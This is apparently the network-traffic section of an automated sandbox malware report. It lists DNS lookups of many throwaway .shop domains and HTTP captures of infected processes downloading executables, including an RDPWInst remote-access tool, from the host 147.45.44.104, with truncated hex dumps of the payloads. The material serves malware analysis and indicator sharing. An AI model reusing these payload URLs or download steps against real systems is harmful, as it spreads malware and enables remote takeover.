Sep 27, 2024 00:29:05.923501968 CEST	53	59699	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:06.877959967 CEST	59417	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:06.890836954 CEST	53	59417	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:07.856404066 CEST	51828	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:07.871936083 CEST	53	51828	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:08.834186077 CEST	50348	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:08.852133989 CEST	53	50348	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:09.902626991 CEST	51250	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:09.918220997 CEST	53	51250	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:10.921550035 CEST	60424	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:10.935664892 CEST	53	60424	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:11.953152895 CEST	63755	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:11.968396902 CEST	53	63755	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:12.956706047 CEST	61346	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:12.956706047 CEST	61967	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:12.967582941 CEST	53	61346	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:12.971426964 CEST	53	61967	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:13.930017948 CEST	62300	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:13.943679094 CEST	53	62300	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:15.098588943 CEST	63939	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:15.106575966 CEST	53	63939	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:16.445492983 CEST	51114	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:16.461613894 CEST	53	51114	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:28.535444975 CEST	56169	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:28.546148062 CEST	53	56169	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:34.384458065 CEST	55156	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:34.421366930 CEST	53	55156	1.1.1.1	192.168.2.6
Sep 27, 2024 00:29:45.079814911 CEST	54809	53	192.168.2.6	1.1.1.1
Sep 27, 2024 00:29:45.090055943 CEST	53	54809	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 00:28:27.294348955 CEST	192.168.2.6	1.1.1.1	0xf835	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:05.908171892 CEST	192.168.2.6	1.1.1.1	0xa517	Standard query (0)	wallkedsleeoi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:06.877959967 CEST	192.168.2.6	1.1.1.1	0x99ba	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:07.856404066 CEST	192.168.2.6	1.1.1.1	0xc4bc	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:08.834186077 CEST	192.168.2.6	1.1.1.1	0xaf7b	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:09.902626991 CEST	192.168.2.6	1.1.1.1	0xe6e	Standard query (0)	vozmeatillu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:10.921550035 CEST	192.168.2.6	1.1.1.1	0xa9c5	Standard query (0)	drawzhotdog.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:11.953152895 CEST	192.168.2.6	1.1.1.1	0x7b34	Standard query (0)	fragnantbui.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:12.956706047 CEST	192.168.2.6	1.1.1.1	0x471	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:12.956706047 CEST	192.168.2.6	1.1.1.1	0xcc13	Standard query (0)	stogeneratmns.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:13.930017948 CEST	192.168.2.6	1.1.1.1	0x59d1	Standard query (0)	reinforcenh.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:15.098588943 CEST	192.168.2.6	1.1.1.1	0x7430	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:16.445492983 CEST	192.168.2.6	1.1.1.1	0x43f5	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:28.535444975 CEST	192.168.2.6	1.1.1.1	0x1c5a	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:34.384458065 CEST	192.168.2.6	1.1.1.1	0x5dc2	Standard query (0)	hansgborn.eu	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:45.079814911 CEST	192.168.2.6	1.1.1.1	0x638d	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 00:28:27.301521063 CEST	1.1.1.1	192.168.2.6	0xf835	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:05.923501968 CEST	1.1.1.1	192.168.2.6	0xa517	No error (0)	wallkedsleeoi.shop	172.67.194.216	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:05.923501968 CEST	1.1.1.1	192.168.2.6	0xa517	No error (0)	wallkedsleeoi.shop	104.21.36.139	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:06.890836954 CEST	1.1.1.1	192.168.2.6	0x99ba	No error (0)	gutterydhowi.shop	104.21.4.136	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:06.890836954 CEST	1.1.1.1	192.168.2.6	0x99ba	No error (0)	gutterydhowi.shop	172.67.132.32	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:07.871936083 CEST	1.1.1.1	192.168.2.6	0xc4bc	No error (0)	ghostreedmnu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:07.871936083 CEST	1.1.1.1	192.168.2.6	0xc4bc	No error (0)	ghostreedmnu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:08.852133989 CEST	1.1.1.1	192.168.2.6	0xaf7b	No error (0)	offensivedzvju.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:08.852133989 CEST	1.1.1.1	192.168.2.6	0xaf7b	No error (0)	offensivedzvju.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:09.918220997 CEST	1.1.1.1	192.168.2.6	0xe6e	No error (0)	vozmeatillu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:09.918220997 CEST	1.1.1.1	192.168.2.6	0xe6e	No error (0)	vozmeatillu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:10.935664892 CEST	1.1.1.1	192.168.2.6	0xa9c5	No error (0)	drawzhotdog.shop	172.67.162.108	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:10.935664892 CEST	1.1.1.1	192.168.2.6	0xa9c5	No error (0)	drawzhotdog.shop	104.21.58.182	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:11.968396902 CEST	1.1.1.1	192.168.2.6	0x7b34	No error (0)	fragnantbui.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:11.968396902 CEST	1.1.1.1	192.168.2.6	0x7b34	No error (0)	fragnantbui.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:12.967582941 CEST	1.1.1.1	192.168.2.6	0x471	No error (0)	cowod.hopto.org	45.132.206.251	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:12.971426964 CEST	1.1.1.1	192.168.2.6	0xcc13	No error (0)	stogeneratmns.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:12.971426964 CEST	1.1.1.1	192.168.2.6	0xcc13	No error (0)	stogeneratmns.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:13.943679094 CEST	1.1.1.1	192.168.2.6	0x59d1	No error (0)	reinforcenh.shop	104.21.77.130	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:13.943679094 CEST	1.1.1.1	192.168.2.6	0x59d1	No error (0)	reinforcenh.shop	172.67.208.139	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:15.106575966 CEST	1.1.1.1	192.168.2.6	0x7430	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:16.461613894 CEST	1.1.1.1	192.168.2.6	0x43f5	No error (0)	ballotnwu.site	172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:16.461613894 CEST	1.1.1.1	192.168.2.6	0x43f5	No error (0)	ballotnwu.site	104.21.2.13	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:28.546148062 CEST	1.1.1.1	192.168.2.6	0x1c5a	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:28.546148062 CEST	1.1.1.1	192.168.2.6	0x1c5a	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:28.546148062 CEST	1.1.1.1	192.168.2.6	0x1c5a	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:34.421366930 CEST	1.1.1.1	192.168.2.6	0x5dc2	No error (0)	hansgborn.eu	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:34.421366930 CEST	1.1.1.1	192.168.2.6	0x5dc2	No error (0)	hansgborn.eu	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:29:45.090055943 CEST	1.1.1.1	192.168.2.6	0x638d	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

5.75.211.162

wallkedsleeoi.shop

gutterydhowi.shop

ghostreedmnu.shop

offensivedzvju.shop

vozmeatillu.shop

drawzhotdog.shop

fragnantbui.shop

stogeneratmns.shop

reinforcenh.shop

ballotnwu.site

hansgborn.eu

147.45.44.104

cowod.hopto.org

api.ipify.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	57901	147.45.44.104	80	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:29:04.303801060 CEST	195	OUT	GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:29:04.946495056 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:04 GMT Content-Type: application/octet-stream Content-Length: 385064 Last-Modified: Thu, 26 Sep 2024 22:09:48 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5dbac-5e028" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$f> @ `S(& H.textD `.rsrc@@.reloc@B H0yYYlv^5fH$/Wazz5O7fSl\RBk5EqvBf9v;(F Jgi(BBMs<ub l]Qg\Bc$fVGZ.8lH;!"pUO8Y"d\dD"sm}c#?4?Y#0VSX\|G.g:!rM[~eBpbz{`5\|\|bOGAh}s
Sep 27, 2024 00:29:04.946511030 CEST	1236	IN	Data Raw: 38 a0 ec cc 57 dc 50 61 47 3f b0 95 f7 55 f7 4b 25 ea 39 5d ff 7c 81 f9 ae 87 b6 77 63 5c 7c 9c e0 42 9a aa 4b 3d 9f 44 8d 15 75 0a 10 47 a3 40 b9 1d 71 fd 17 d3 79 30 67 e6 d1 e5 35 d8 ac 09 69 9a 8c a7 f3 13 a1 04 3c 06 74 5a e9 d0 02 51 13 87 Data Ascii: 8WPaG?UK%9]\|wc\\|BK=DuG@qy0g5i<tZQBg*M-jX=dI+:&zIj7eG@p)l{ >@~yM%H};7$lWdTtymhQQ;?(sx_/u9bO[
Sep 27, 2024 00:29:04.946522951 CEST	448	IN	Data Raw: 78 31 03 30 a5 b4 37 4e b6 91 c7 59 cd cb 89 0b d3 c8 22 34 53 ee 3d 10 65 5d a4 39 04 a2 eb a1 0d 84 e2 79 8e 91 fb 9b 6b 3b b2 ea ca bf de 4e 93 dc d2 e7 1e 7f 0d 78 ab 1f 73 d6 8c 4a 80 66 ab f9 eb 72 71 5f 9b 59 89 38 9d 05 82 fc 42 bb 27 e4 Data Ascii: x107NY"4S=e]9yk;NxsJfrq_Y8B'LUa>bnD8QvG30EAa\qk/. l4J1B2 e?BOcAy;!,ymT9D?]GjFxkh*s:t]
Sep 27, 2024 00:29:04.946559906 CEST	1236	IN	Data Raw: 70 4c 26 45 79 c9 d0 59 88 33 ca 65 e4 86 a5 24 7b 3e c1 7d b2 cf 94 62 cc e5 3c 37 01 0f dc 4f 52 04 72 11 d0 57 75 12 53 5b 08 76 b4 90 a7 58 f1 0d 76 fb 40 f4 33 51 fc a9 bd 42 28 67 05 c0 b9 ad 75 30 5c 77 c0 2f af c6 69 1e c1 85 e4 5b 16 5c Data Ascii: pL&EyY3e${>}b<7ORrWuS[vXv@3QB(gu0\w/i[\Wu2R/RuQ^\ZwP;;^>)m7xz$PT+s%*K_!%#VN?Pt)^W-L Xj^~Q!aq
Sep 27, 2024 00:29:04.946573019 CEST	1236	IN	Data Raw: a5 a1 85 35 aa ac 8b b6 cd 97 f9 54 72 da e4 f5 6f 87 cb 52 77 b4 b1 ef 3b 0e 69 d6 30 42 53 b9 7f a6 b1 61 2c ea 2d 12 99 ae 28 74 7b e8 6f 01 d2 bc f2 55 ca fc 6c 73 ab 39 11 cb 5f cc 5d 86 9a 62 bc 56 d5 5e cb 1a cf 6a 73 73 03 9c 06 05 32 9b Data Ascii: 5TroRw;i0BSa,-(t{oUls9_]bV^jss2W5!YXdW`DA)ETp"Dv/8M9`(yX"msFl,'`8eW2-[ssqS[o[njSoXk[ISzWC7r R$
Sep 27, 2024 00:29:04.946583986 CEST	448	IN	Data Raw: bc 8c 26 77 e3 4f 9b 7a 6a e2 f3 9c 97 e3 7e 96 41 e7 df dd 7e 85 8e 0b fe 1f c5 e1 8c bd 08 44 76 bc c8 c6 80 a8 cf 46 f3 17 fd 9c 7b 74 83 c9 62 c5 3b fc 17 e9 be 08 d0 1f b5 de e0 75 8c 71 49 11 c5 f4 16 b4 41 dd 88 20 17 6b 46 06 2e ec 21 d2 Data Ascii: &wOzj~A~DvF{tb;uqIA kF.!-K%(:;;O5Z&s(0LzPrH6{RzZ!;rFG 4>YuIcxb$%k(\|DjkTjE@WjxiLld}u[hk
Sep 27, 2024 00:29:04.946598053 CEST	1236	IN	Data Raw: 1b 4b 86 8a 7c ce 31 8e 8a eb fe a6 24 fc 31 31 eb 71 4a fe a1 31 0a 76 36 28 00 f3 44 15 5a 18 b8 d2 5a 9a 3a 71 e4 b3 3b 95 06 c5 85 86 49 d7 5d ed 44 53 11 6c 7c e0 9a e4 41 de 7d 84 a9 d6 75 19 22 e8 a9 ea 95 38 28 e4 4f 43 01 36 9a 83 f6 2b Data Ascii: K\|1$11qJ1v6(DZZ:q;I]DSl\|A}u"8(OC6+L=w/6a;P/6P1tN_>\|[q1a;K?7+N;#A:yn4O!~&pt<oAActS"\|yFo**=n
Sep 27, 2024 00:29:04.946610928 CEST	1236	IN	Data Raw: 44 b2 06 30 bb 81 e8 e9 7a 5b d0 56 6a 47 09 34 31 46 d9 a9 d7 fe 4d 36 38 11 f4 5d 99 fd b3 db 47 32 8b 0a 78 4a 32 83 7f 31 b1 7c 79 ef 82 ae cd d3 f4 ad db 5f d0 78 20 de a2 d9 9e 56 c1 d9 c1 de b7 c0 c2 30 aa 59 dd 3e e0 54 02 b5 db f9 d9 3c Data Ascii: D0z[VjG41FM68]G2xJ21\|y_x V0Y>T<&t&]3>N]:}-S,!ZJ/8[7\|>c[og7kMe#knoP5;W\|]'Rrl]SyjZsK6Y-u#e0tb
Sep 27, 2024 00:29:04.946624994 CEST	1236	IN	Data Raw: c4 39 c1 76 8e 54 45 fa 29 eb 4e d2 46 89 4e 55 ea 69 da 5a a9 de 7b e7 7b e3 01 4d d9 21 78 7f 7a 55 d3 e8 21 a7 59 2f d7 dd 33 ce a7 2b 2c c5 dd e6 04 9c 87 fb ba 1b 02 3f 31 eb 83 7b 3d de 00 8f 8a 6a 68 8e d0 a8 93 d4 a5 03 bb 37 e6 e9 81 bb Data Ascii: 9vTE)NFNUiZ{{M!xzU!Y/3+,?1{=jh70D%3="PQ5~%HqBBltK&(/jZGJpsc\B(r5P`B#\|\|1TS=KWC%N)x,c]J''&J(S*)YY<[
Sep 27, 2024 00:29:04.946636915 CEST	1236	IN	Data Raw: f9 1c 61 8b e8 3a bb f9 cc 32 ba bf ae 38 d4 17 57 cf 40 3f 52 cb 87 84 87 c4 4c 28 26 a0 6a 74 b7 84 3b 62 32 11 4c 9d d0 e9 df 35 6e 78 20 70 9e 70 1b e3 05 07 96 7d cf 06 3c f5 9e 39 dd a9 ff 42 2c 8a f8 09 74 36 6a 30 85 91 5a be 81 76 92 69 Data Ascii: a:28W@?RL(&jt;b2L5nx pp}<9B,t6j0Zvi5@KsLP*NU75]d\S,Ai js}nRL%GQ(8Qy)Ebk{ &%Do{eYVbDxGcET5rTrCHLu0aiv.S
Sep 27, 2024 00:29:04.951699018 CEST	1236	IN	Data Raw: 85 cd b4 71 d9 25 cc 74 43 9f 72 48 05 73 23 76 c2 2e 27 f1 49 6a 9c 7e 61 5b f4 1f d8 c1 a3 0a 28 58 30 94 04 d0 a1 28 e9 9f 8c 8e 2e 79 0f 06 28 43 74 be ed 8f e9 83 ad 99 aa 9e c4 26 84 61 a2 6a 62 09 18 b3 9c e5 f6 0b 9f 3f a6 16 77 9e 67 08 Data Ascii: q%tCrHs#v.'Ij~a[(X0(.y(Ct&ajb?wg;)*IY=ml~DMu<4+ooyj@ROxZj_vpLOqa]x]8E^JI(hgD:kt.Tr}:@L6ok
Sep 27, 2024 00:29:07.173235893 CEST	192	OUT	GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:29:07.364537954 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:07 GMT Content-Type: application/octet-stream Content-Length: 413224 Last-Modified: Thu, 26 Sep 2024 22:09:34 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5db9e-64e28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf>< @@ `;S@((&`: H.textD `.rsrc@ @@.reloc`&@B <H0^8=.Qv A3[RJ_f9\lvC#SsnB~E~i7}+V#8f#XWb(<O1$=UN8)LL(K,r%9LY=0T4&d.(U'="(>d+92p81Pa\q]X/a@0CPQBv6le24I3PC:v}QwpS(AQg'N_XmvgJ/J6^D^MIO45+e^
Sep 27, 2024 00:29:09.350205898 CEST	188	OUT	GET /prog/66f5de72d9ebd_rdp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:29:09.657164097 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:09 GMT Content-Type: application/octet-stream Content-Length: 73216 Last-Modified: Thu, 26 Sep 2024 22:21:38 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5de72-11e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 a3 40 a0 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 04 01 00 00 18 00 00 00 00 00 00 fe 21 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 21 01 00 4b 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2@"0! @@ `!K@` H.text `.rsrc@@@.reloc`@B!H\T%h,("(6\|(0Vs1rp((2Js1s3(4Zrp((oE(N:rp(r6p((O(r(p((rZp(oE:rp(rZp(r]p({r]p((RoS(Tb:rp(oU*0n(s(rpo(sooo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	57911	147.45.44.104	80	6240	C:\ProgramData\BKJKEBGDHD.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:29:10.415793896 CEST	94	OUT	GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1 Host: 147.45.44.104 Connection: Keep-Alive
Sep 27, 2024 00:29:11.062302113 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:10 GMT Content-Type: application/octet-stream Content-Length: 1785344 Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f55533-1b3e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext\|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`\|@@p@@
Sep 27, 2024 00:29:11.062325001 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt@@SmallInt
Sep 27, 2024 00:29:11.062336922 CEST	1236	IN	Data Raw: 15 40 00 42 00 f4 ff b2 15 40 00 43 00 f4 ff f0 15 40 00 42 00 f4 ff 1f 16 40 00 42 00 f4 ff 48 16 40 00 43 00 f4 ff 7c 16 40 00 43 00 f4 ff b5 16 40 00 43 00 f4 ff e0 16 40 00 43 00 f4 ff 09 17 40 00 43 00 f4 ff 35 17 40 00 43 00 f4 ff 71 17 40 Data Ascii: @B@C@B@BH@C\|@C@C@C@C5@Cq@C@C@C-@Bg@B@B@C%@CV@C@J@J@J@Ju@J@J@J@JO@Kz@J@MTOb
Sep 27, 2024 00:29:11.062350035 CEST	1236	IN	Data Raw: 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 70 53 40 00 08 55 6e 69 74 4e 61 6d 65 03 00 10 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 10 12 40 00 01 00 01 01 02 00 02 00 33 00 48 52 40 00 06 45 71 75 61 6c 73 03 Data Ascii: Self3pS@UnitName@Self@@3HR@Equals@@Self@Obj+PR@GetHashCode@@Self38T@ToString@@Self@@[0T@SafeCallExceptionl@
